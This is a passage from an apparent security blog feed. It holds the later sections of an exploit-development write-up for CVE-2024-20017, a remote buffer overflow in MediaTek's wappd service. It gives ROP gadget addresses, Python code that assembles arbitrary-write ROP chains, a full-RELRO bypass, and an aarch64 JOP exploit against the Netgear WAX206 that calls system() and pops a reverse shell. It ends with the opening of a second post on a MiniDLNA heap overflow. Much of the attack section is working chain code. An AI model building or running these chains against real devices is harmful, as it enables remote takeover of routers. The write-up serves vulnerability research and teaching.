the flow of execution, our best bet is going to be to use ROP to get it. As with any exploit that
relies on ROP, there’s a certain amount of luck involved in that the binary your exploit is written
against needs to contain the required ROP gadgets within the main executable (shared objs will be
affected by ASLR).</p>

<p>If we think about how the previous write primitive worked, there was a pointer value being
dereferenced and a value assigned (i.e. written) to the memory it pointed to. What would this look
like in assembly? Probably something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	mov rax, [rsp+0x30];     # read a value from some address into $rax
	mov [rax], rbx;          # write the value of $rbx to the address pointed to by the value in $rax (deref $rax as pointer)
</code></pre></div></div>

<p>So, if we can find a gadget (or gadgets) that will allow us to do this kind of operation and we can
control the values that are used for both sides of the operation, we should be able to get an
arbitrary write primitive. And, it turns out, luck is on our side! The gadget below (<code class="language-plaintext highlighter-rouge">GADGET_A</code>) is
available:</p>

<p><strong>GADGET_A</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">0x405574</code>:
    <ul>
      <li><code class="language-plaintext highlighter-rouge">mov rdx, QWORD PTR [rsp+0x50];</code>: read a value at <code class="language-plaintext highlighter-rouge">$rsp+0x50</code> (top of stack+80) into <code class="language-plaintext highlighter-rouge">$rdx</code></li>
      <li><code class="language-plaintext highlighter-rouge">mov QWORD PTR [rdx], rax</code>: dereference <code class="language-plaintext highlighter-rouge">$rdx</code> as a pointer and write the value in <code class="language-plaintext highlighter-rouge">$rax</code> to that location</li>
      <li><code class="language-plaintext highlighter-rouge">xor eax, eax;</code>: 0 out lower 32 bits of <code class="language-plaintext highlighter-rouge">$rax</code></li>
      <li><code class="language-plaintext highlighter-rouge">add rsp, 0x48;</code>: shift the stack pointer up by <code class="language-plaintext highlighter-rouge">0x48</code> bytes</li>
      <li><code class="language-plaintext highlighter-rouge">ret;</code>: return</li>
    </ul>
  </li>
</ul>

<p>Great! This gets us most of the way there. But first, we need to find a way to get controlled
values into <code class="language-plaintext highlighter-rouge">$rax</code> as that will be what gets written to the address in <code class="language-plaintext highlighter-rouge">$rdx</code>.  To do this, we need
to find a gadget that will take a value from the stack and put it into <code class="language-plaintext highlighter-rouge">$rax</code>, same as before. This
is usually easy enough as  <code class="language-plaintext highlighter-rouge">pop</code> operations happen all over the place and the odds are at least one
of them pops to <code class="language-plaintext highlighter-rouge">$rax</code>. This is the gadget I chose to go with for this exploit (<code class="language-plaintext highlighter-rouge">GADGET_B</code>):</p>

<p><strong>GADGET_B</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">0x0042acd8: pop rax; add rsp, 0x18; pop rbx; pop rbp; ret;</code>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">pop rax;</code>: pop the value at the top of the stack into <code class="language-plaintext highlighter-rouge">$rax</code></li>
      <li><code class="language-plaintext highlighter-rouge">add rsp, 0x18;</code>: increment <code class="language-plaintext highlighter-rouge">$rsp</code> by <code class="language-plaintext highlighter-rouge">0x18 (24)</code> bytes; will need +24 bytes of padding to account for this operation</li>
      <li><code class="language-plaintext highlighter-rouge">pop rbx; pop rbp;</code>: pop the next two values from the (new) top of the stack into <code class="language-plaintext highlighter-rouge">$rbx</code> and <code class="language-plaintext highlighter-rouge">$rbp</code>, respectively; will need +16 bytes of padding to account for this operation</li>
      <li><code class="language-plaintext highlighter-rouge">ret;</code>: return</li>
    </ul>
  </li>
</ul>

<p>Chaining the second gadget with the first one gets us everything we need! We can now write an
arbitrary 8-byte value to an arbitrary address, assuming we control the values at the top of the
stack when execution is redirected (which we will since we corrupt the saved return address, which
is at the top of the stack). Here’s what the payload for this chain would look like, including the
padding needed to account for the instructions that modify the stack pointer.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GADGET_B
value_to_write ; popped into rax
padding[40]    ; account for 2 pops and a +0x18 shift to rsp
GADGET_A       ; value jumped to after ret from GADGET_B; read $rsp+0x50 into rdx
padding[72]    ; account for rsp+0x48
&lt;next_jump_addr&gt; ; addr jumped to after ret from GADGET_A
addr_to_write_to ; value read into $rdx in the start of GADGET_A
</code></pre></div></div>
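
<p>The same layout can be sketched as a small Python helper. This is a simplified illustration and not
the code from the linked exploit: the gadget addresses are the ones listed above, while
<code class="language-plaintext highlighter-rouge">pack64()</code> and <code class="language-plaintext highlighter-rouge">write_chain()</code> are names I picked for the example.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GADGET_A = 0x405574    # mov rdx, [rsp+0x50]; mov [rdx], rax; xor eax, eax; add rsp, 0x48; ret
GADGET_B = 0x42ACD8    # pop rax; add rsp, 0x18; pop rbx; pop rbp; ret


def pack64(value):
    """Pack an integer as 8 little-endian bytes."""
    return value.to_bytes(8, "little")


def write_chain(value, dest, next_addr):
    """One GADGET_B + GADGET_A pass: store 8-byte value at dest, then go to next_addr."""
    chain = pack64(GADGET_B)
    chain += pack64(value)       # popped into rax
    chain += b"B" * 40           # add rsp, 0x18 (24 bytes) + pop rbx + pop rbp (16 bytes)
    chain += pack64(GADGET_A)    # ret target of GADGET_B
    chain += b"A" * 0x48         # skipped over by add rsp, 0x48
    chain += pack64(next_addr)   # sits at rsp+0x48: ret target of GADGET_A
    chain += pack64(dest)        # sits at rsp+0x50: loaded into rdx by GADGET_A
    return chain


if __name__ == "__main__":
    # Destination and follow-up address are placeholders for the example.
    chain = write_chain(int.from_bytes(b"/bin/sh\x00", "little"), 0x4B0000, 0x41414141)
    print(len(chain), chain.hex())
</code></pre></div></div>

<p>The offsets in the comments are relative to the value of <code class="language-plaintext highlighter-rouge">$rsp</code> when <code class="language-plaintext highlighter-rouge">GADGET_A</code> starts executing,
which is the slot immediately after the <code class="language-plaintext highlighter-rouge">GADGET_A</code> address in the payload.</p>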

<p>Similar to the previous exploit, this ROP chain can be inserted multiple times to write more than 8
bytes starting at a target address, but in order to do this, there’s one more gadget that is needed
to deal with a minor nuance in how <code class="language-plaintext highlighter-rouge">GADGET_A</code> interacts with the stack.</p>

<p>The first gadget we discuss above (<code class="language-plaintext highlighter-rouge">GADGET_A</code>) reads the value at <code class="language-plaintext highlighter-rouge">$rsp+0x50</code> into <code class="language-plaintext highlighter-rouge">$rdx</code>, so our
payload needs to place the address we want to write to at a <code class="language-plaintext highlighter-rouge">+0x50</code> byte offset from where this
gadget is in the payload. It then shifts the stack up by <code class="language-plaintext highlighter-rouge">+0x48</code>, leaving the stack pointer pointing
to the value right <em>before</em> the value we use as the write destination. This means the address of the
next gadget needs to be placed at <code class="language-plaintext highlighter-rouge">+0x48</code> so that it will be used when <code class="language-plaintext highlighter-rouge">ret</code> is reached; if we want
to perform <em>another</em> write, this would be the address for <code class="language-plaintext highlighter-rouge">GADGET_B</code>, and this is where the issue
comes up. After jumping to <code class="language-plaintext highlighter-rouge">GADGET_B</code>, it will pop the next value from the top of the stack
(<code class="language-plaintext highlighter-rouge">[$rsp]</code>) into <code class="language-plaintext highlighter-rouge">$rax</code>, but since <code class="language-plaintext highlighter-rouge">GADGET_A</code> shifted the stack pointer by <code class="language-plaintext highlighter-rouge">+0x48</code>, when the <code class="language-plaintext highlighter-rouge">ret</code> is
reached in <code class="language-plaintext highlighter-rouge">GADGET_A</code> the value of <code class="language-plaintext highlighter-rouge">$rsp</code> is incremented by 8 and left pointing to offset <code class="language-plaintext highlighter-rouge">+0x50</code>
(the value we pass as the write destination), and this is the value that <code class="language-plaintext highlighter-rouge">GADGET_B</code> would end up
popping into <code class="language-plaintext highlighter-rouge">$rax</code>. That’s not what we want, but thankfully there’s a simple way to solve this
problem: instead of jumping directly to <code class="language-plaintext highlighter-rouge">GADGET_B</code> at the end of the first chain, we jump to another
gadget that will pop a single value from the stack (thereby incrementing <code class="language-plaintext highlighter-rouge">$rsp</code>  to <code class="language-plaintext highlighter-rouge">+0x58</code>) and
we’ll place the address to <code class="language-plaintext highlighter-rouge">GADGET_B</code> there so that we jump to it when this gadget returns.</p>

<p>So, taking that into account, this is how the <code class="language-plaintext highlighter-rouge">GADGET_B+GADGET_A</code> sub-chain(?) would be chained
multiple times:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt;GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
&gt;GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+0x50 into rdx
padding[72]        ; account for rsp+0x48
&gt;POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A;
--
&gt;GADGET_B
value_to_write     ; popped into rax
padding[40]        ; account for 2 pops and a +0x18 shift to rsp
&gt;GADGET_A          ; value jumped to after ret from GADGET_B; read $rsp+0x50 into rdx
padding[72]        ; account for rsp+0x48
&gt;POP_RET_GADGET    ; addr jumped to after ret from GADGET_A; pop-ret so GADGET_B 8 bytes up is next ret address and not addr_to_write_to
addr_to_write_to   ; value read into $rdx in the start of GADGET_A
--
...
--
&gt;GADGET_B
value_to_write
padding[40]
&gt;GADGET_A
padding[72]
&gt;FINAL_JUMP_DEST   ; addr jumped to after arbitrary write is done
addr_to_write_to
</code></pre></div></div>
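
<p>For anyone who finds code easier to follow than stack diagrams, here is a hedged Python sketch of
the repeated layout above. It is an illustration rather than the linked exploit: <code class="language-plaintext highlighter-rouge">POP_RET</code> is a
made-up address standing in for whatever single-pop gadget is available, and the helper names are
my own. It also assumes the destination memory is already zeroed (or that the data carries its own
terminator), since padding is only added to fill the last 8-byte block.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GADGET_A = 0x405574    # write gadget (address from the post)
GADGET_B = 0x42ACD8    # pop rax gadget (address from the post)
POP_RET = 0x401234     # hypothetical: any gadget of the form "pop reg; ret"


def pack64(value):
    """Pack an integer as 8 little-endian bytes."""
    return value.to_bytes(8, "little")


def multi_write_chain(base_addr, data, final_dest):
    """Chain one write pass per 8-byte block of data, starting at base_addr."""
    data += b"\x00" * (-len(data) % 8)            # pad to a multiple of 8 bytes
    blocks = [data[i:i + 8] for i in range(0, len(data), 8)]
    chain = b""
    for idx, block in enumerate(blocks):
        last = idx == len(blocks) - 1
        chain += pack64(GADGET_B)
        chain += block                            # popped into rax
        chain += b"B" * 40                        # add rsp, 0x18 + two pops
        chain += pack64(GADGET_A)
        chain += b"A" * 0x48                      # skipped by add rsp, 0x48
        # Between passes, POP_RET discards the destination slot so that the
        # following ret lands on the next GADGET_B instead of the address.
        chain += pack64(final_dest if last else POP_RET)
        chain += pack64(base_addr + idx * 8)      # read into rdx by GADGET_A
    return chain


if __name__ == "__main__":
    # Base address and final destination are placeholders for the example.
    print(multi_write_chain(0x4B0000, b"/bin/sh -c id", 0x41414141).hex())
</code></pre></div></div>

<p>One thing to keep in mind: when the final destination starts executing, <code class="language-plaintext highlighter-rouge">$rsp</code> points at the last
<code class="language-plaintext highlighter-rouge">addr_to_write_to</code> slot, so whatever runs next has to account for that value being at the top of the
stack.</p>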

<p>If this last part was hard to follow, don’t worry about it (it was also hard to write). The
important part is that rather than jumping directly back to <code class="language-plaintext highlighter-rouge">GADGET_B</code> when linking multiple
instances of the chain, we instead jump to a gadget that will pop a value from the stack and then
return into <code class="language-plaintext highlighter-rouge">GADGET_B</code>. This is done to ensure the values in the payload are properly
adjusted between iterations through the chain.</p>

<h3 id="dealing-with-full-relro">dealing with full RELRO</h3>

<p>Having acquired the write primitive we needed, we can use the same strategy as the previous exploit
to write our shell payload at a predictable address, with a slight modification. As we can no longer
write into the GOT or PLT segments due to full RELRO, we instead write the shell command passed to
<code class="language-plaintext highlighter-rouge">system()</code> in the only remaining writeable segments that have static/predictable addresses (assuming
no PIE) – the .bss and .data segments. Once that’s done, the exploit jumps to a final ROP chain
that places the address where we wrote the command into <code class="language-plaintext highlighter-rouge">$rdi</code> and jumps to <code class="language-plaintext highlighter-rouge">system()</code> via the GOT
symbol so we don’t need to leak the libc address.</p>

<p>We get command execution and use it to pop a reverse shell.</p>

<p><img src="/assets/images/mtk-wapp-exploit3.png" alt="mtk-wapp-exploit3.png" /></p>

<hr />

<h2 id="exploit-4-wax206-return-address-corruption--arbitrary-rw-via-pointer-corruption">exploit 4: WAX206 return address corruption + arbitrary r/w via pointer corruption</h2>

<ul>
  <li>Build: aarch64, build shipped with Netgear WAX206</li>
  <li>Mitigations: full RELRO, ASLR, NX, stack canaries*</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/WAX206-aarch64/wax-rip-system-rop.py" target="_blank">Exploit code</a></li>
</ul>

<p>We’ve made it to the final exploit! For this one we’re going to switch things up a bit and move on
to a real-world target: the version of wappd shipped on the <a href="https://www.netgear.com/support/product/wax206/" target="_blank">Netgear
WAX206</a>. This version is compiled for aarch64 and
has ASLR, NX, full RELRO, and stack cookies enabled. I think it offers some valuable insight into
the differences between writing exploits in controlled environments vs. writing them against
real-world targets – things often change in important ways that force you to adapt.</p>

<h3 id="the-story">the story</h3>

<p>I’m going to switch up the writing style for this section and use more of a narrative
format so that I can provide some context by walking through the process of how I figured everything
out. This exploit was a bit of a challenge to figure out and I think the process is best told as a
story. After that we’ll switch back to the style used in the preceding sections.</p>

<p><em>DISCLAIMER: This is the first time I’ve written this kind of exploit for an arm64 target and I had
to learn a lot of the stuff mentioned below along the way. For this reason, you should take the
details with a grain of salt as they’re my current understanding of how/why things worked a certain
way but they might not be 100% accurate. If you notice anything that’s incorrect please let me
know!</em></p>

<h4 id="important-changes">important changes</h4>

<p>I’ll start this section by going over some of the important differences between
this target and the previous ones, and how they ultimately impacted the final exploit.</p>

<p>The first major change was a difference in the optimization and inlining of code in the binary.
Whether it was the result of different compiler versions, architectural differences, or something
else, I’m ultimately not sure. But the outcome was that the layout of stack variables changed and
corrupting the <code class="language-plaintext highlighter-rouge">OidReq</code> pointer that was previously targeted was no longer viable,
similar to <strong>exploit 3</strong>. So, this meant there was no arbitrary write primitive to start with. What
about a code redirection primitive (which the previous exploit relied on to get the write
primitive)?</p>

<p>This is where the next important difference comes in: arm64’s way of handling function returns. In
arm64, the return address is usually expected to be in the <code class="language-plaintext highlighter-rouge">x30</code> register and it will only be pushed
onto the stack for nested function calls that will need to overwrite it. I learned this the hard way
when I attached to the process with GDB and could see my target jump address correctly placed on the
stack to be used on the next return…and then saw it go completely ignored when the function hit
the final <code class="language-plaintext highlighter-rouge">ret</code> and used the value in <code class="language-plaintext highlighter-rouge">x30</code> without touching the stack. The inlining mentioned above
resulted in various function calls along the path of the vulnerable code getting inlined into one
massive function, eliminating basically every opportunity to corrupt a return address on the stack
which would be used in a <code class="language-plaintext highlighter-rouge">ret</code> (inlined functions don’t <code class="language-plaintext highlighter-rouge">ret</code>). To top it all off, the <em>only</em> stack
frame that did have a saved return address that could be corrupted and that would actually be used
was for the main request processing loop – which runs infinitely and won’t return unless a SIGTERM
signal is caught (we’ll come back to this shortly). There is a ton of nuance for each of these
changes and their effect on the final exploit, but tl;dr, this meant needing to go back to the
drawing board to come up with a new exploit strategy.</p>

<p>The <em>one</em> piece of good news was that even though <code class="language-plaintext highlighter-rouge">checksec</code> reports that the binary has stack
canaries enabled, analyzing it in Binja showed that the cookie-checking logic inserted by the
compiler was only present in two functions, and those were from an external library. This meant that
I wouldn’t actually have to worry about stack cookies at all! Too bad corrupting saved return
addresses seems to be out of the question given the conditions described in the previous
paragraph…</p>

<h4 id="arbitrary-write-via-ppktbuf-pointer-corruption">arbitrary write via pPktBuf pointer corruption</h4>

<p>Based on the way I’d approached the previous exploits, I figured there had to be a way to corrupt a
pointer somewhere so that’s what I tackled first. After spending a bit of time doing some debugging
live on the WAX206 and testing different payloads, I eventually found that I could overwrite three
of the pointers defined in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>: <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code>. The first of
these, <code class="language-plaintext highlighter-rouge">pPktBuf</code>, points to the buffer that is used to store the inbound request data read from the
network – corrupting this pointer allows us to point it to an arbitrary location and then have the
entire contents of a subsequent request (up to 1600 bytes) written to that location. Great!</p>

<p>Interestingly, it was the effects of the inlining and arm64 semantics mentioned above that made it
possible to reach these pointers at all – under normal circumstances, writing far enough to reach
them would result in corrupting the stack frames for both <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> and
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code>, and cause a premature crash before the corrupted pointers could be used
again. In this case, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code> is inlined directly into <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> (so no
return address is used) and <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is able to get through its execution without
having to push/pop its return address value onto the stack where it could be corrupted.</p>

<p>So, I now had a write primitive of up to 1600 bytes to a controllable location. That should be
enough to get over the finish line, right?</p>

<h4 id="when-arbitrary-write-isnt-enough">when arbitrary write isn’t enough</h4>

<p>What exploit strategies are viable to achieve code execution when starting with only an arbitrary
write? Taking into account the mitigations present (namely ASLR) and assuming no leak is available,
there’s really only one option in this case: corrupt some data <em>located at a predictable/known
address</em>  which will either result in code execution directly (e.g. overwriting a function pointer)
or create conditions that will result in additional corruption that can be leveraged to take control
of execution. So, here we return to the concept discussed in <strong>exploit 2</strong>: finding corruptible data
that will be used by the application in a way that can be exploited.</p>

<p>I’ll save you the time (and frustration) of going over every possible avenue I went down looking for
this next piece and just tell you now: there was <em>nothing</em>. While there were multiple global
structures filled with function pointers, none of them are used within the request processing loop.
The data portions of some other data structures with viable targets also are unused. Full RELRO
means corrupting GOT/PLT entries is also out. And this brings us the main point here: sometimes even
arbitrary write primitives will <em>not be enough</em> to gain code execution. I’m of the mind that it’s
always a good idea to follow every thread and try every possible angle during exploit dev, but the
reality is that sometimes there just isn’t one. Valid vulnerabilities that are exploitable in one
environment will not always be exploitable in another; everything matters. Which is why I also
follow the motto “exploit or GTFO” – unless impact has been shown against the real target with a
real exploit, little can be said about the <em>real-world impact</em> of a vulnerability.</p>

<h4 id="accepting-defeat-the-exploit-will-only-work-on-termination">accepting defeat: the exploit will only work on termination</h4>

<p>As mentioned in the <strong>important changes</strong> section, there was <em>one</em> return address that could be
corrupted: the one for <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>. The issue was that this function only returns on process
termination when a SIGTERM is caught and handled. I’d initially ignored this since there’s no way to
force this termination as a remote attacker but, having hit a dead-end on finding another execution
primitive, I had to accept defeat and just decided to write the exploit with the assumption that the
process would terminate and hit the corrupted return address. The end of this post would be pretty
anticlimactic if I just stopped here, right?</p>

<h3 id="final-exploit-overview">final exploit overview</h3>

<p>Having gone over all of the important bits of the process that eventually led to the final exploit,
we’ll now switch back to the present and talk about how the exploit works. Given that this post is
already pretty long, I’ll avoid going over <em>every</em> detail of how the final exploit came together and
instead focus on the parts that I think are most interesting or important (feel free to reach out on
twitter if you have any follow up questions). This one reuses a few of the concepts that were
covered in previous exploits, including using pointer corruption to get a write primitive, using the
.bss/.data segment as a buffer for the main payload, and leveraging ROP (technically JOP, in this
case) to set up the arguments for calling <code class="language-plaintext highlighter-rouge">system()</code> to get command execution.</p>

<p>To summarize where we’re starting from:</p>
<ul>
  <li>We have an arbitrary write primitive of up to 1600 bytes via corruption of the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer</li>
  <li>We have a way to redirect code execution via corruption of the saved return address in the stack frame for <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> (but this will only be triggered when the process receives a SIGTERM signal)</li>
</ul>

<p>The exploit is split up into two requests: one that corrupts the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer to set up the
write primitive and another that uses the write primitive to write the shell payload and some other
data into a known memory region for later use.</p>

<p>The first one is pretty straightforward as all that really needs to be done is send a payload large
enough to overflow up to the <code class="language-plaintext highlighter-rouge">pPktBuf</code> pointer and make it point to the start of the .bss segment in
memory. As this pointer is used to store incoming request data, the contents of the <em>next</em> request
we send will be written to that address. Apart from corrupting this pointer, the first payload also
corrupts the <code class="language-plaintext highlighter-rouge">pCmdBuf</code> pointer, which is used to store data parsed out of the packet we send. As
such, <code class="language-plaintext highlighter-rouge">pCmdBuf</code> needs to point to a writeable segment of memory to avoid crashing or prematurely
aborting, so we overwrite it to also point to an offset into the .bss, but far enough to ensure it
won’t affect the payload sent in the second request.</p>

<p>The second request is where the real action happens. Having set up the write primitive with the
first request, this new payload needs to accomplish the following:</p>

<ol>
  <li>Write our shell command to a location we can reference when we call <code class="language-plaintext highlighter-rouge">system()</code></li>
  <li>Corrupt the saved return address to redirect code execution to a ROP gadget used to set up the argument to <code class="language-plaintext highlighter-rouge">system()</code>
    <ul>
      <li>ROP/JOP gadget does:
        <ul>
          <li>moves the value in <code class="language-plaintext highlighter-rouge">x24</code> to <code class="language-plaintext highlighter-rouge">x0</code> (<code class="language-plaintext highlighter-rouge">x0</code> is used to pass the first arg to the called function)</li>
          <li>jumps to the value in <code class="language-plaintext highlighter-rouge">x22</code></li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Provide the address to <code class="language-plaintext highlighter-rouge">system()</code> and the address of the shell command from step 1 so they can be used by the ROP gadget. These values will be loaded in registers when the corrupted return address is used and exec jumps to the ROP gadget.
    <ul>
      <li>address where shell command string was written -&gt; loaded into x24 (the gadget then moves it to x0)</li>
      <li>address of <code class="language-plaintext highlighter-rouge">system().plt</code> -&gt; loaded into x22</li>
    </ul>
  </li>
  <li>Corrupt the <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code> pointers to set them to NULL to avoid triggering libc malloc sanity checks when these pointers are free’d in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> during termination</li>
  <li>Redirect execution to <code class="language-plaintext highlighter-rouge">system()</code> after having set up the argument (i.e. the address to the shell command written in step 1)</li>
</ol>

<p>The first two steps are pretty simple. We write the shell command we want executed right at the
start of the payload; since we’ve corrupted <code class="language-plaintext highlighter-rouge">pPktBuf</code> to point to a known location and that’s where
this second payload will be written, we can predict where this string will be located. In this case,
as <code class="language-plaintext highlighter-rouge">pPktBuf</code> has been set to the start of the .bss segment, the command string will be located 16
bytes into the .bss segment (to account for the packet header and other fields of the SB packet
struct). For step two, we know the offset into the overflow where the saved return address for
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> is located, so we simply overwrite that location with the address of the ROP
gadget we’ll use to set up arguments and redirect execution to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p>Let’s take a moment to talk about that ROP gadget and ROP in general on arm64 vs. x86.  As mentioned
before, the return semantics are different in arm64 vs x86, which means the gadgets work a little
differently. In particular, ROP gadgets in arm64 don’t just need to end in a <code class="language-plaintext highlighter-rouge">ret</code> in order to be
useful; they have to end with the correct stack operation to pop the next value on the stack into
<code class="language-plaintext highlighter-rouge">x30</code> before executing the <code class="language-plaintext highlighter-rouge">ret</code>.  This combined with the fact that arm64 has many more general
purpose registers vs. x86 means that the likelihood of finding gadgets that make use of registers
you can control and that <em>also</em> properly set up for the <code class="language-plaintext highlighter-rouge">ret</code> is much lower vs. x86, where there are
only a handful of registers that are used and whatever is next on the stack is used automatically on
<code class="language-plaintext highlighter-rouge">ret</code>.</p>

<p>Anyway, the gadget used in the final exploit is technically a JOP (Jump Oriented Programming) gadget
so we avoid the issue with <code class="language-plaintext highlighter-rouge">ret</code> entirely. Rather than using <code class="language-plaintext highlighter-rouge">ret</code> to redirect execution, JOP
gadgets jump directly to a value stored in a register. We get lucky in that we’re able to control a
handful of registers at the time when execution is redirected to the gadget. Two of those registers
are <code class="language-plaintext highlighter-rouge">x22</code> and <code class="language-plaintext highlighter-rouge">x24</code>, so we’re able to use the following gadget, which simply moves the value in
<code class="language-plaintext highlighter-rouge">x24</code> to <code class="language-plaintext highlighter-rouge">x0</code> (the register used to pass the first arg to a function) and then jumps to the address
in <code class="language-plaintext highlighter-rouge">x22</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov x0, x24;   # we'll put the addr of the shell command string in x24
blr x22;       # and the address of `system()` in x22
</code></pre></div></div>
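<p>To make the data flow through that gadget concrete, here’s a toy Python model of it. This is only a sketch: the register values, the fake memory map, and the <code class="language-plaintext highlighter-rouge">fake_system()</code> stand-in are all made up for illustration and don’t correspond to real addresses on the target.</p>

```python
def run_jop_gadget(regs, memory, functions):
    """Model `mov x0, x24; blr x22` on a dict of register values."""
    regs = dict(regs)                # work on a copy of the caller's registers
    regs["x0"] = regs["x24"]         # mov x0, x24
    target = functions[regs["x22"]]  # blr x22: branch to the address held in x22
    return target(memory[regs["x0"]])


def fake_system(command):
    # Stand-in for system(); it only reports what it was asked to run.
    return "would run: " + command


# Hypothetical addresses, chosen only for this example.
CMD_ADDR = 0x1000
SYSTEM_ADDR = 0x2000

memory = {CMD_ADDR: "id"}
functions = {SYSTEM_ADDR: fake_system}
regs = {"x22": SYSTEM_ADDR, "x24": CMD_ADDR}

result = run_jop_gadget(regs, memory, functions)
print(result)
```

<p>The point is just that whoever controls <code class="language-plaintext highlighter-rouge">x22</code> and <code class="language-plaintext highlighter-rouge">x24</code> when the gadget runs controls both the function being called and its first argument.</p>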

<p>Going back to the remainder of the exploit, the only other thing that needs to be done is corrupt
the <code class="language-plaintext highlighter-rouge">pPktBuf</code>, <code class="language-plaintext highlighter-rouge">pCmdBuf</code>, and <code class="language-plaintext highlighter-rouge">pRspBuf</code> pointers to set them each to NULL. We do this because at the
end of <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code>, prior to returning and using our corrupted return address, these
pointers will be passed to <code class="language-plaintext highlighter-rouge">free()</code> if they’re not NULL. If they’re still pointing to the previous
locations we set them to, we’ll end up tripping libc malloc’s sanity checks and hitting an
<code class="language-plaintext highlighter-rouge">abort()</code> before we’re able to redirect execution.</p>

<p>With all of that in place, we arrive at the Promised Land:</p>

<p><img src="/assets/images/mtk-wapp-exploit-wax206.png" alt="mtk-wapp-exploit-wax206.png" /></p>

<h2 id="bonus-triggering-a-kernel-bug-by-performing-arbitrary-ioctl-calls-via-jop">bonus: triggering a kernel bug by performing arbitrary IOCTL calls via JOP</h2>

<p>As a final bonus, what if you could write one exploit for two completely separate vulns? Like if
there happened to be a bug in a kernel driver that could only be reached locally and a separate bug
in a network service that could be exploited remotely…? Well, you might have to do some wacky
stuff like use a JOP chain to open a new socket, construct an <code class="language-plaintext highlighter-rouge">iwreq</code> struct in memory to pass to
the kernel, set up arguments, and trigger a call to <code class="language-plaintext highlighter-rouge">ioctl()</code>. But if you can find a way…</p>

<p><img src="/assets/images/mtk-wapp-exploit-rop2kernel.png" alt="mtk-wapp-exploit-rop2kernel.png" /></p>

<p>Why do this rather than just use the command exec to download the kernel exploit and run it? Just to
show you can ;)</p>

<h2 id="wrapping-up">wrapping up</h2>

<p>This post ended up being much longer than I had initially intended it to be! I hope I provided
enough info along the way without making it boring or (too) confusing. I also hope it’s helpful to
anyone looking to learn more about exploit development and that it can provide some insight into the
different approaches that can be taken in different circumstances. Exploiting a stack buffer
overflow is fundamentally the same across all codebases – it’s everything else around the overflow
that makes it interesting and challenging. It’s like working on an intricate puzzle where there’s no
guarantee all of the pieces will fit together but there’s also more than one way to solve it. This
is what makes exploit development fun for me and why I’d go through the trouble of writing 4
different exploits for the same bug. This shit breaks your brain a little lol.</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017" target="_blank">Exploit code</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20017" target="_blank">NVD - CVE-2024-20017</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/March-2024" target="_blank">MediaTek March 2024
  Advisory</a></li>
  <li><a href="https://github.com/denandz/fuzzotron" target="_blank">Fuzzotron</a></li>
  <li><a href="https://downloads.openwrt.org/snapshots/targets/mediatek/mt7622/" target="_blank">OpenWrt MT7622 images
  page</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="cve-2024-20017" /><category term="wappd" /><category term="0day" /><category term="mediatek" /><category term="exploit" /><summary type="html"><![CDATA[a post going over 4 exploits for CVE-2024-20017, a remotely exploitable buffer overflow in a component of the MediaTek MT7622 SDK.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/mtk-wapp-exploit-wax206.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/mtk-wapp-exploit-wax206.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">chonked pt.2: exploiting cve-2023-33476 for remote code execution</title><link href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html" rel="alternate" type="text/html" title="chonked pt.2: exploiting cve-2023-33476 for remote code execution" /><published>2023-06-19T00:00:00+00:00</published><updated>2023-06-19T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html"><![CDATA[<p>This is the second part of the two-part series covering a heap overflow I found in ReadyMedia
MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going
over the various challenges that had to be overcome and how everything was put together to achieve
remote code execution and pop a reverse shell using a tcache poisoning attack. Check out the first
post for an in-depth root cause analysis and overview of the vulnerability.</p>

<h2 id="introduction">Introduction</h2>
<p>This is the second part of the two-part series covering a heap overflow I found in ReadyMedia
